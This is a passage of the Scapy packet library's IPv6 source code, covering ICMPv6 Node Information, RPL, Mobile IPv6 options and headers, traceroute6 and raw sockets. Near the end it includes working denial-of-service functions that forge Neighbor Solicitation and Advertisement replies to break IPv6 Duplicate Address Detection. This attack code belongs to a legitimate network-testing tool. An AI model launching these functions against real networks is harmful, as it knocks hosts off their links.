]) # (2, [ttl, dns_names]) : dns_names is one string that contains # all the DNS names. Internally it is kept ready to be sent # (undissected). i2repr() decode it for user. This is to # make build after dissection bijective. # # I also merged getfield() and m2i(), and addfield() and i2m(). class NIReplyDataField(StrField): def i2h(self, pkt, x): if x is None: return x t, val = x if t == 2: ttl, dnsnames = val val = [ttl] + dnsrepr2names(dnsnames) return val def h2i(self, pkt, x): qtype = 0 # We will decode it as string if not # overridden through 'qtype' in pkt # No user hint, let's use 'qtype' value for that purpose if not isinstance(x, tuple): if pkt is not None: qtype = pkt.qtype else: qtype = x[0] x = x[1] # From that point on, x is the value (second element of the tuple) if qtype == 2: # DNS name if isinstance(x, (str, bytes)): # listify the string x = [x] if isinstance(x, list): x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501 if x and isinstance(x[0], six.integer_types): ttl = x[0] names = x[1:] else: ttl = 0 names = x return (2, [ttl, names2dnsrepr(names)]) elif qtype in [3, 4]: # IPv4 or IPv6 addr if not isinstance(x, list): x = [x] # User directly provided an IP, instead of list def fixvalue(x): # List elements are not tuples, user probably # omitted ttl value : we will use 0 instead if not isinstance(x, tuple): x = (0, x) # Decode bytes if six.PY3 and isinstance(x[1], bytes): x = (x[0], x[1].decode()) return x return (qtype, [fixvalue(d) for d in x]) return (qtype, x) def addfield(self, pkt, s, val): t, tmp = val if tmp is None: tmp = b"" if t == 2: ttl, dnsstr = tmp return s + struct.pack("!I", ttl) + dnsstr elif t == 3: return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501 elif t == 4: return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501 else: return s + tmp def getfield(self, pkt, s): code = getattr(pkt, "code") if code != 0: return s, (0, b"") qtype = getattr(pkt, "qtype") if qtype == 0: # NOOP return s, (0, b"") elif qtype == 2: if len(s) < 4: return s, (0, b"") ttl = struct.unpack("!I", s[:4])[0] return b"", (2, [ttl, s[4:]]) elif qtype == 3: # IPv6 addresses with TTLs # XXX TODO : get the real length res = [] while len(s) >= 20: # 4 + 16 ttl = struct.unpack("!I", s[:4])[0] ip = inet_ntop(socket.AF_INET6, s[4:20]) res.append((ttl, ip)) s = s[20:] return s, (3, res) elif qtype == 4: # IPv4 addresses with TTLs # XXX TODO : get the real length res = [] while len(s) >= 8: # 4 + 4 ttl = struct.unpack("!I", s[:4])[0] ip = inet_ntop(socket.AF_INET, s[4:8]) res.append((ttl, ip)) s = s[8:] return s, (4, res) else: # XXX TODO : implement me and deal with real length return b"", (0, s) def i2repr(self, pkt, x): if x is None: return "[]" if isinstance(x, tuple) and len(x) == 2: t, val = x if t == 2: # DNS names ttl, tmp_len = val tmp_len = dnsrepr2names(tmp_len) names_list = (plain_str(name) for name in tmp_len) return "ttl:%d %s" % (ttl, ",".join(names_list)) elif t == 3 or t == 4: return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501 return repr(val) return repr(x) # XXX should not happen # By default, sent responses have code set to 0 (successful) class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6): name = "ICMPv6 Node Information Reply - NOOP Reply" fields_desc = [ByteEnumField("type", 140, icmp6types), ByteEnumField("code", 0, _nireply_code), XShortField("cksum", None), ShortEnumField("qtype", 0, icmp6_niqtypes), BitField("unused", 0, 10), FlagsField("flags", 0, 6, "TACLSG"), NonceField("nonce", None), NIReplyDataField("data", None)] class ICMPv6NIReplyName(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Node Names" qtype = 2 class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - IPv6 addresses" qtype = 3 class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - IPv4 addresses" qtype = 4 class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Responder refuses to supply answer" code = 1 class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Qtype unknown to the responder" code = 2 def _niquery_guesser(p): cls = conf.raw_layer type = orb(p[0]) if type == 139: # Node Info Query specific stuff if len(p) > 6: qtype, = struct.unpack("!H", p[4:6]) cls = {0: ICMPv6NIQueryNOOP, 2: ICMPv6NIQueryName, 3: ICMPv6NIQueryIPv6, 4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer) elif type == 140: # Node Info Reply specific stuff code = orb(p[1]) if code == 0: if len(p) > 6: qtype, = struct.unpack("!H", p[4:6]) cls = {2: ICMPv6NIReplyName, 3: ICMPv6NIReplyIPv6, 4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP) elif code == 1: cls = ICMPv6NIReplyRefuse elif code == 2: cls = ICMPv6NIReplyUnknown return cls ############################################################################# ############################################################################# # Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) # ############################################################################# ############################################################################# # https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes rplcodes = {0: "DIS", 1: "DIO", 2: "DAO", 3: "DAO-ACK", # 4: "P2P-DRO", # 5: "P2P-DRO-ACK", # 6: "Measurement", 7: "DCO", 8: "DCO-ACK"} class ICMPv6RPL(_ICMPv6): # RFC 6550 name = 'RPL' fields_desc = [ByteEnumField("type", 155, icmp6types), ByteEnumField("code", 0, rplcodes), XShortField("cksum", None)] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}} ############################################################################# ############################################################################# # Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) # ############################################################################# ############################################################################# # Mobile IPv6 ICMPv6 related classes class ICMPv6HAADRequest(_ICMPv6): name = 'ICMPv6 Home Agent Address Discovery Request' fields_desc = [ByteEnumField("type", 144, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("R", 1, 1, {1: 'MR'}), XBitField("res", 0, 15)] def hashret(self): return struct.pack("!H", self.id) + self.payload.hashret() class ICMPv6HAADReply(_ICMPv6): name = 'ICMPv6 Home Agent Address Discovery Reply' fields_desc = [ByteEnumField("type", 145, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("R", 1, 1, {1: 'MR'}), XBitField("res", 0, 15), IP6ListField('addresses', None)] def hashret(self): return struct.pack("!H", self.id) + self.payload.hashret() def answers(self, other): if not isinstance(other, ICMPv6HAADRequest): return 0 return self.id == other.id class ICMPv6MPSol(_ICMPv6): name = 'ICMPv6 Mobile Prefix Solicitation' fields_desc = [ByteEnumField("type", 146, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), XShortField("res", 0)] def _hashret(self): return struct.pack("!H", self.id) class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6): name = 'ICMPv6 Mobile Prefix Advertisement' fields_desc = [ByteEnumField("type", 147, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}), XBitField("res", 0, 14)] def hashret(self): return struct.pack("!H", self.id) def answers(self, other): return isinstance(other, ICMPv6MPSol) # Mobile IPv6 Options classes _mobopttypes = {2: "Binding Refresh Advice", 3: "Alternate Care-of Address", 4: "Nonce Indices", 5: "Binding Authorization Data", 6: "Mobile Network Prefix (RFC3963)", 7: "Link-Layer Address (RFC4068)", 8: "Mobile Node Identifier (RFC4283)", 9: "Mobility Message Authentication (RFC4285)", 10: "Replay Protection (RFC4285)", 11: "CGA Parameters Request (RFC4866)", 12: "CGA Parameters (RFC4866)", 13: "Signature (RFC4866)", 14: "Home Keygen Token (RFC4866)", 15: "Care-of Test Init (RFC4866)", 16: "Care-of Test (RFC4866)"} class _MIP6OptAlign(Packet): """ Mobile IPv6 options have alignment requirements of the form x*n+y. This class is inherited by all MIPv6 options to help in computing the required Padding for that option, i.e. the need for a Pad1 or PadN option before it. They only need to provide x and y as class parameters. (x=0 and y=0 are used when no alignment is required)""" __slots__ = ["x", "y"] def alignment_delta(self, curpos): x = self.x y = self.y if x == 0 and y == 0: return 0 delta = x * ((curpos - y + x - 1) // x) + y - curpos return delta def extract_padding(self, p): return b"", p class MIP6OptBRAdvice(_MIP6OptAlign): name = 'Mobile IPv6 Option - Binding Refresh Advice' fields_desc = [ByteEnumField('otype', 2, _mobopttypes), ByteField('olen', 2), ShortField('rinter', 0)] x = 2 y = 0 # alignment requirement: 2n class MIP6OptAltCoA(_MIP6OptAlign): name = 'MIPv6 Option - Alternate Care-of Address' fields_desc = [ByteEnumField('otype', 3, _mobopttypes), ByteField('olen', 16), IP6Field("acoa", "::")] x = 8 y = 6 # alignment requirement: 8n+6 class MIP6OptNonceIndices(_MIP6OptAlign): name = 'MIPv6 Option - Nonce Indices' fields_desc = [ByteEnumField('otype', 4, _mobopttypes), ByteField('olen', 16), ShortField('hni', 0), ShortField('coni', 0)] x = 2 y = 0 # alignment requirement: 2n class MIP6OptBindingAuthData(_MIP6OptAlign): name = 'MIPv6 Option - Binding Authorization Data' fields_desc = [ByteEnumField('otype', 5, _mobopttypes), ByteField('olen', 16), BitField('authenticator', 0, 96)] x = 8 y = 2 # alignment requirement: 8n+2 class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963 name = 'NEMO Option - Mobile Network Prefix' fields_desc = [ByteEnumField("otype", 6, _mobopttypes), ByteField("olen", 18), ByteField("reserved", 0), ByteField("plen", 64), IP6Field("prefix", "::")] x = 8 y = 4 # alignment requirement: 8n+4 class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068 name = "MIPv6 Option - Link-Layer Address (MH-LLA)" fields_desc = [ByteEnumField("otype", 7, _mobopttypes), ByteField("olen", 7), ByteEnumField("ocode", 2, _rfc4068_lla_optcode), ByteField("pad", 0), MACField("lla", ETHER_ANY)] # Only support ethernet x = 0 y = 0 # alignment requirement: none class MIP6OptMNID(_MIP6OptAlign): # RFC 4283 name = "MIPv6 Option - Mobile Node Identifier" fields_desc = [ByteEnumField("otype", 8, _mobopttypes), FieldLenField("olen", None, length_of="id", fmt="B", adjust=lambda pkt, x: x + 1), ByteEnumField("subtype", 1, {1: "NAI"}), StrLenField("id", "", length_from=lambda pkt: pkt.olen - 1)] x = 0 y = 0 # alignment requirement: none # We only support decoding and basic build. Automatic HMAC computation is # too much work for our current needs. It is left to the user (I mean ... # you). --arno class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5) name = "MIPv6 Option - Mobility Message Authentication" fields_desc = [ByteEnumField("otype", 9, _mobopttypes), FieldLenField("olen", None, length_of="authdata", fmt="B", adjust=lambda pkt, x: x + 5), ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501 2: "MN-AAA authentication mobility option"}), # noqa: E501 IntField("mspi", None), StrLenField("authdata", "A" * 12, length_from=lambda pkt: pkt.olen - 5)] x = 4 y = 1 # alignment requirement: 4n+1 # Extracted from RFC 1305 (NTP) : # NTP timestamps are represented as a 64-bit unsigned fixed-point number, # in seconds relative to 0h on 1 January 1900. The integer part is in the # first 32 bits and the fraction part in the last 32 bits. class NTPTimestampField(LongField): def i2repr(self, pkt, x): if x < ((50 * 31536000) << 32): return "Some date a few decades ago (%d)" % x # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to # January 1st 1970 : delta = -2209075761 i = int(x >> 32) j = float(x & 0xffffffff) * 2.0**-32 res = i + j + delta t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res)) return "%s (%d)" % (t, x) class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 6) name = "MIPv6 option - Replay Protection" fields_desc = [ByteEnumField("otype", 10, _mobopttypes), ByteField("olen", 8), NTPTimestampField("timestamp", 0)] x = 8 y = 2 # alignment requirement: 8n+2 class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6) name = "MIPv6 option - CGA Parameters Request" fields_desc = [ByteEnumField("otype", 11, _mobopttypes), ByteField("olen", 0)] x = 0 y = 0 # alignment requirement: none # XXX TODO: deal with CGA param fragmentation and build of defragmented # XXX version. Passing of a big CGAParam structure should be # XXX simplified. Make it hold packets, by the way --arno class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1) name = "MIPv6 option - CGA Parameters" fields_desc = [ByteEnumField("otype", 12, _mobopttypes), FieldLenField("olen", None, length_of="cgaparams", fmt="B"), StrLenField("cgaparams", "", length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2) name = "MIPv6 option - Signature" fields_desc = [ByteEnumField("otype", 13, _mobopttypes), FieldLenField("olen", None, length_of="sig", fmt="B"), StrLenField("sig", "", length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3) name = "MIPv6 option - Home Keygen Token" fields_desc = [ByteEnumField("otype", 14, _mobopttypes), FieldLenField("olen", None, length_of="hkt", fmt="B"), StrLenField("hkt", "", length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4) name = "MIPv6 option - Care-of Test Init" fields_desc = [ByteEnumField("otype", 15, _mobopttypes), ByteField("olen", 0)] x = 0 y = 0 # alignment requirement: none class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 5.5) name = "MIPv6 option - Care-of Test" fields_desc = [ByteEnumField("otype", 16, _mobopttypes), FieldLenField("olen", None, length_of="cokt", fmt="B"), StrLenField("cokt", b'\x00' * 8, length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none class MIP6OptUnknown(_MIP6OptAlign): name = 'Scapy6 - Unknown Mobility Option' fields_desc = [ByteEnumField("otype", 6, _mobopttypes), FieldLenField("olen", None, length_of="odata", fmt="B"), StrLenField("odata", "", length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none @classmethod def dispatch_hook(cls, _pkt=None, *_, **kargs): if _pkt: o = orb(_pkt[0]) # Option type if o in moboptcls: return moboptcls[o] return cls moboptcls = {0: Pad1, 1: PadN, 2: MIP6OptBRAdvice, 3: MIP6OptAltCoA, 4: MIP6OptNonceIndices, 5: MIP6OptBindingAuthData, 6: MIP6OptMobNetPrefix, 7: MIP6OptLLAddr, 8: MIP6OptMNID, 9: MIP6OptMsgAuth, 10: MIP6OptReplayProtection, 11: MIP6OptCGAParamsReq, 12: MIP6OptCGAParams, 13: MIP6OptSignature, 14: MIP6OptHomeKeygenToken, 15: MIP6OptCareOfTestInit, 16: MIP6OptCareOfTest} # Main Mobile IPv6 Classes mhtypes = {0: 'BRR', 1: 'HoTI', 2: 'CoTI', 3: 'HoT', 4: 'CoT', 5: 'BU', 6: 'BA', 7: 'BE', 8: 'Fast BU', 9: 'Fast BA', 10: 'Fast NA'} # From http://www.iana.org/assignments/mobility-parameters bastatus = {0: 'Binding Update accepted', 1: 'Accepted but prefix discovery necessary', 128: 'Reason unspecified', 129: 'Administratively prohibited', 130: 'Insufficient resources', 131: 'Home registration not supported', 132: 'Not home subnet', 133: 'Not home agent for this mobile node', 134: 'Duplicate Address Detection failed', 135: 'Sequence number out of window', 136: 'Expired home nonce index', 137: 'Expired care-of nonce index', 138: 'Expired nonces', 139: 'Registration type change disallowed', 140: 'Mobile Router Operation not permitted', 141: 'Invalid Prefix', 142: 'Not Authorized for Prefix', 143: 'Forwarding Setup failed (prefixes missing)', 144: 'MIPV6-ID-MISMATCH', 145: 'MIPV6-MESG-ID-REQD', 146: 'MIPV6-AUTH-FAIL', 147: 'Permanent home keygen token unavailable', 148: 'CGA and signature verification failed', 149: 'Permanent home keygen token exists', 150: 'Non-null home nonce index expected'} class _MobilityHeader(Packet): name = 'Dummy IPv6 Mobility Header' overload_fields = {IPv6: {"nh": 135}} def post_build(self, p, pay): p += pay tmp_len = self.len if self.len is None: tmp_len = (len(p) - 8) // 8 p = p[:1] + struct.pack("B", tmp_len) + p[2:] if self.cksum is None: cksum = in6_chksum(135, self.underlayer, p) else: cksum = self.cksum p = p[:4] + struct.pack("!H", cksum) + p[6:] return p class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg name = "IPv6 Mobility Header - Generic Message" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", None, mhtypes), ByteField("res", None), XShortField("cksum", None), StrLenField("msg", b"\x00" * 2, length_from=lambda pkt: 8 * pkt.len - 6)] class MIP6MH_BRR(_MobilityHeader): name = "IPv6 Mobility Header - Binding Refresh Request" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 0, mhtypes), ByteField("res", None), XShortField("cksum", None), ShortField("res2", None), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 8, length_from=lambda pkt: 8 * pkt.len)] overload_fields = {IPv6: {"nh": 135}} def hashret(self): # Hack: BRR, BU and BA have the same hashret that returns the same # value b"\x00\x08\x09" (concatenation of mhtypes). This is # because we need match BA with BU and BU with BRR. --arno return b"\x00\x08\x09" class MIP6MH_HoTI(_MobilityHeader): name = "IPv6 Mobility Header - Home Test Init" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 1, mhtypes), ByteField("res", None), XShortField("cksum", None), StrFixedLenField("reserved", b"\x00" * 2, 2), StrFixedLenField("cookie", b"\x00" * 8, 8), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 16, length_from=lambda pkt: 8 * (pkt.len - 1))] overload_fields = {IPv6: {"nh": 135}} def hashret(self): return bytes_encode(self.cookie) class MIP6MH_CoTI(MIP6MH_HoTI): name = "IPv6 Mobility Header - Care-of Test Init" mhtype = 2 def hashret(self): return bytes_encode(self.cookie) class MIP6MH_HoT(_MobilityHeader): name = "IPv6 Mobility Header - Home Test" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 3, mhtypes), ByteField("res", None), XShortField("cksum", None), ShortField("index", None), StrFixedLenField("cookie", b"\x00" * 8, 8), StrFixedLenField("token", b"\x00" * 8, 8), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 24, length_from=lambda pkt: 8 * (pkt.len - 2))] overload_fields = {IPv6: {"nh": 135}} def hashret(self): return bytes_encode(self.cookie) def answers(self, other): if (isinstance(other, MIP6MH_HoTI) and self.cookie == other.cookie): return 1 return 0 class MIP6MH_CoT(MIP6MH_HoT): name = "IPv6 Mobility Header - Care-of Test" mhtype = 4 def hashret(self): return bytes_encode(self.cookie) def answers(self, other): if (isinstance(other, MIP6MH_CoTI) and self.cookie == other.cookie): return 1 return 0 class LifetimeField(ShortField): def i2repr(self, pkt, x): return "%d sec" % (4 * x) class MIP6MH_BU(_MobilityHeader): name = "IPv6 Mobility Header - Binding Update" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 ByteEnumField("mhtype", 5, mhtypes), ByteField("res", None), XShortField("cksum", None), XShortField("seq", None), # TODO: ShortNonceField FlagsField("flags", "KHA", 7, "PRMKLHA"), XBitField("reserved", 0, 9), LifetimeField("mhtime", 3), # unit == 4 seconds _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 12, length_from=lambda pkt: 8 * pkt.len - 4)] overload_fields = {IPv6: {"nh": 135}} def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() return b"\x00\x08\x09" def answers(self, other): if isinstance(other, MIP6MH_BRR): return 1 return 0 class MIP6MH_BA(_MobilityHeader): name = "IPv6 Mobility Header - Binding ACK" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 ByteEnumField("mhtype", 6, mhtypes), ByteField("res", None), XShortField("cksum", None), ByteEnumField("status", 0, bastatus), FlagsField("flags", "K", 3, "PRK"), XBitField("res2", None, 5), XShortField("seq", None), # TODO: ShortNonceField XShortField("mhtime", 0), # unit == 4 seconds _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 12, length_from=lambda pkt: 8 * pkt.len - 4)] overload_fields = {IPv6: {"nh": 135}} def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() return b"\x00\x08\x09" def answers(self, other): if (isinstance(other, MIP6MH_BU) and other.mhtype == 5 and self.mhtype == 6 and other.flags & 0x1 and # Ack request flags is set self.seq == other.seq): return 1 return 0 _bestatus = {1: 'Unknown binding for Home Address destination option', 2: 'Unrecognized MH Type value'} # TODO: match Binding Error to its stimulus class MIP6MH_BE(_MobilityHeader): name = "IPv6 Mobility Header - Binding Error" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 ByteEnumField("mhtype", 7, mhtypes), ByteField("res", 0), XShortField("cksum", None), ByteEnumField("status", 0, _bestatus), ByteField("reserved", 0), IP6Field("ha", "::"), _OptionsField("options", [], MIP6OptUnknown, 24, length_from=lambda pkt: 8 * (pkt.len - 2))] overload_fields = {IPv6: {"nh": 135}} _mip6_mhtype2cls = {0: MIP6MH_BRR, 1: MIP6MH_HoTI, 2: MIP6MH_CoTI, 3: MIP6MH_HoT, 4: MIP6MH_CoT, 5: MIP6MH_BU, 6: MIP6MH_BA, 7: MIP6MH_BE} ############################################################################# ############################################################################# # Traceroute6 # ############################################################################# ############################################################################# class AS_resolver6(AS_resolver_riswhois): def _resolve_one(self, ip): """ overloaded version to provide a Whois resolution on the embedded IPv4 address if the address is 6to4 or Teredo. Otherwise, the native IPv6 address is passed. """ if in6_isaddr6to4(ip): # for 6to4, use embedded @ tmp = inet_pton(socket.AF_INET6, ip) addr = inet_ntop(socket.AF_INET, tmp[2:6]) elif in6_isaddrTeredo(ip): # for Teredo, use mapped address addr = teredoAddrExtractInfo(ip)[2] else: addr = ip _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr) if asn.startswith("AS"): try: asn = int(asn[2:]) except ValueError: pass return ip, asn, desc class TracerouteResult6(TracerouteResult): __slots__ = [] def show(self): return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! # noqa: E501 s.hlim, r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501 "{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501 def get_trace(self): trace = {} for s, r in self.res: if IPv6 not in s: continue d = s[IPv6].dst if d not in trace: trace[d] = {} t = not (ICMPv6TimeExceeded in r or ICMPv6DestUnreach in r or ICMPv6PacketTooBig in r or ICMPv6ParamProblem in r) trace[d][s[IPv6].hlim] = r[IPv6].src, t for k in six.itervalues(trace): try: m = min(x for x, y in six.iteritems(k) if y[1]) except ValueError: continue for li in list(k): # use list(): k is modified in the loop if li > m: del k[li] return trace def graph(self, ASres=AS_resolver6(), **kargs): TracerouteResult.graph(self, ASres=ASres, **kargs) @conf.commands.register def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), l4=None, timeout=2, verbose=None, **kargs): """Instant TCP traceroute using IPv6 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None """ if verbose is None: verbose = conf.verb if l4 is None: a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501 else: a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4, timeout=timeout, verbose=verbose, **kargs) a = TracerouteResult6(a.res) if verbose: a.display() return a, b ############################################################################# ############################################################################# # Sockets # ############################################################################# ############################################################################# class L3RawSocket6(L3RawSocket): def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501 L3RawSocket.__init__(self, type, filter, iface, promisc) # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 def IPv6inIP(dst='203.178.135.36', src=None): _IPv6inIP.dst = dst _IPv6inIP.src = src if not conf.L3socket == _IPv6inIP: _IPv6inIP.cls = conf.L3socket else: del(conf.L3socket) return _IPv6inIP class _IPv6inIP(SuperSocket): dst = '127.0.0.1' src = None cls = None def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501 SuperSocket.__init__(self, family, type, proto) self.worker = self.cls(**args) def set(self, dst, src=None): _IPv6inIP.src = src _IPv6inIP.dst = dst def nonblock_recv(self): p = self.worker.nonblock_recv() return self._recv(p) def recv(self, x): p = self.worker.recv(x) return self._recv(p, x) def _recv(self, p, x=MTU): if p is None: return p elif isinstance(p, IP): # TODO: verify checksum if p.src == self.dst and p.proto == socket.IPPROTO_IPV6: if isinstance(p.payload, IPv6): return p.payload return p def send(self, x): return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501 ############################################################################# ############################################################################# # Neighbor Discovery Protocol Attacks # ############################################################################# ############################################################################# def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Internal generic helper accepting a specific callback as first argument, for NS or NA reply. See the two specific functions below. """ def is_request(req, mac_src_filter, tgt_filter): """ Check if packet req is a request """ # Those simple checks are based on Section 5.4.2 of RFC 4862 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): return 0 # Get and compare the MAC address mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 # Source must be the unspecified address if req[IPv6].src != "::": return 0 # Check destination is the link-local solicited-node multicast # address associated with target address in received NS tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) if tgt_filter and tgt != tgt_filter: return 0 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst) expected_snma = in6_getnsma(tgt) if received_snma != expected_snma: return 0 return 1 if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), prn=lambda x: reply_callback(x, reply_mac, iface), iface=iface) def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3756. This is done by listening incoming NS messages sent from the unspecified address and sending a NS reply for the target address, leading the peer to believe that another node is also performing DAD for that address. By default, the fake NS sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the unspecified address (::). - as IPv6 destination address: the link-local solicited-node multicast address derived from the target address in received NS. - the mac address of the interface as source (or reply_mac, see below). - the multicast mac address derived from the solicited node multicast address used as IPv6 destination address. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. """ def ns_reply_callback(req, reply_mac, iface): """ Callback that reply to a NS by sending a similar NS """ # Let's build a reply and send it mac = req[Ether].src dst = req[IPv6].dst tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501 sendp(rep, iface=iface, verbose=0) print("Reply NS for target address %s (received from %s)" % (tgt, mac)) _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter, tgt_filter, reply_mac) def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3756. This is done by listening incoming NS messages *sent from the unspecified address* and sending a NA reply for the target address, leading the peer to believe that another node is also performing DAD for that address. By default, the fake NA sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the target address found in received NS. - as IPv6 destination address: the link-local solicited-node multicast address derived from the target address in received NS. - the mac address of the interface as source (or reply_mac, see below). - the multicast mac address derived from the solicited node multicast address used as IPv6 destination address. - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled with the mac address used as source of the NA. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided 